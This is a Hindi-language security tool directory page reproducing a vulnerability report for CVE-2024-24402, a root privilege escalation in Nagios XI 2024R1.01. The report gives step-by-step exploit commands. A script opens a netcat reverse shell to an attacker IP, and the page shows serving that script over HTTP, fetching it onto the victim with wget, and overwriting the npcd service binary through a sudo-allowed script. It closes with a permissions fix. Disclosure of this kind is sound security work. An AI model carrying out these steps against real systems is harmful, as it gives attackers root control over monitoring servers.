Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-24402 — Nagios 2024R1.01 में विशेषाधिकार वृद्धि | Kitploit
उपकरण/GitHubGitHub/mawk0235/cve-2024-24402
विशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणपोस्ट-शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंग
GitHubmawk0235/cve-2024-24402

CVE-2024-24402

Nagios 2024R1.01 में विशेषाधिकार वृद्धि

रिपॉजिटरी देखें
42 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

भेद्यता रिपोर्ट

CVE द्वारा खोजा गया: Jarod Jaslow (MAWK)

भेद्यता विवरण:

  • एंडपॉइंट: Nagios XI Version 2024R1.01
  • भेद्यता प्रकार: उपयोगकर्ता "NAGIOS" से विशेषाधिकार वृद्धि
  • शोषण परिणाम: लक्ष्य प्रणाली पर पूर्ण रूट पहुंच

पुनरुत्पादन के चरण:

1. Nagios XI Version 2024R1.01 का एक नया इंस्टेंस बनाएं:

  • Nagios XI OVA फ़ाइल डाउनलोड करें: https://assets.nagios.com/downloads/nagiosxi/2024/ovf/nagiosxi-2024R1.0.1-64.ova
  • एक नया इंस्टेंस बनाने के लिए OVA तैनात करें।
  • मेरी पिछली रिपोर्ट का उपयोग करके सर्वर पर RCE प्राप्त करें

2. विशेषाधिकार वृद्धि का दुरुपयोग करें:

  • उपयोगकर्ता "NAGIOS" के रूप में, हमलावर मशीन पर निम्नलिखित सामग्री वाली एक फ़ाइल बनाएं:

    root@kitploit:~
    #!/bin/bash
    nc -e /bin/bash <Attacker IP> 4445
    

Pasted image 20240118113554

  • हमलावर मशीन पर Python HTTP सर्वर के माध्यम से फ़ाइल होस्ट करें:

    root@kitploit:~
    python3 -m http.server 8000
    

Pasted image 20240118173813

  • हमलावर मशीन पर Netcat (NC) लिसनिंग सर्वर शुरू करें:

    root@kitploit:~
    nc -nlvp 4445
    

Pasted image 20240118173831

3. पीड़ित कंप्यूटर पर शोषण निष्पादित करें:

  • हमलावर मशीन से फ़ाइल प्राप्त करें:

    root@kitploit:~
    wget http://<Attacker IP>:8000/npcd
    

Pasted image 20240118173846

  • विशेषाधिकार बढ़ाने और रूट के रूप में कनेक्शन प्राप्त करने के लिए निम्नलिखित कमांड निष्पादित करें:

    root@kitploit:~
    sudo /usr/local/nagiosxi/scripts/manage_services.sh stop npcd
    cp npcd /usr/local/nagios/bin/npcd
    sudo /usr/local/nagiosxi/scripts/manage_services.sh start npcd
    

Pasted image 20240118173857

Pasted image 20240118173915

सिफारिश:

यह अनुशंसित है कि उपयोगकर्ता "NAGIOS" की रूट के रूप में चलने वाले Nagios सेवा निष्पादन योग्य फ़ाइलों में लिखने की क्षमता को प्रतिबंधित किया जाए। यह Nagios सेवाओं से संबंधित प्रासंगिक निर्देशिकाओं और फ़ाइलों के लिए सख्त फ़ाइल अनुमतियाँ और पहुँच नियंत्रण लागू करके प्राप्त किया जा सकता है।

नए रिलीज़ में इसे ठीक किया जाना चाहिए

CVE:

https://cve.mitre.org/cgi-bin/cvename.cgi?name=2024-24402

टूल डाउनलोड करें